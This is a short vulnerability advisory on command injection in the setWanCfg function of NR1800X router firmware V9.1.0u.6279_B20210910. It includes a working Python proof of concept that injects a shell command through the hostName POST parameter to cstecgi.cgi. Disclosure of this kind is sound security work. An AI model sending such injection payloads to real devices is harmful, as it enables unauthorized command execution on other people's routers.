Overview

Affected version

NR1800X_Firmware V9.1.0u.6279_B20210910

Vulnerability details

NR1800X_Firmware V9.1.0u.6279_B20210910 has a command injection vulnerability in the setWanCfg function. The v48 variable receives the hostName parameter from a POST request. Because the user controls the value of hostName, the doSystem statement that uses it is vulnerable to command injection.


POC

import requests

# Device CGI endpoint (loopback address as given in the report)
url = "http://127.0.0.1/cgi-bin/cstecgi.cgi"
cookie = {"Cookie": "SESSION_ID=2:1721039211:2"}
data = {
    "topicurl": "setWanCfg",
    # hostName carries the injected shell command
    "hostName": "';ls -al ../ ;'",
    "proto": "80"
}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)
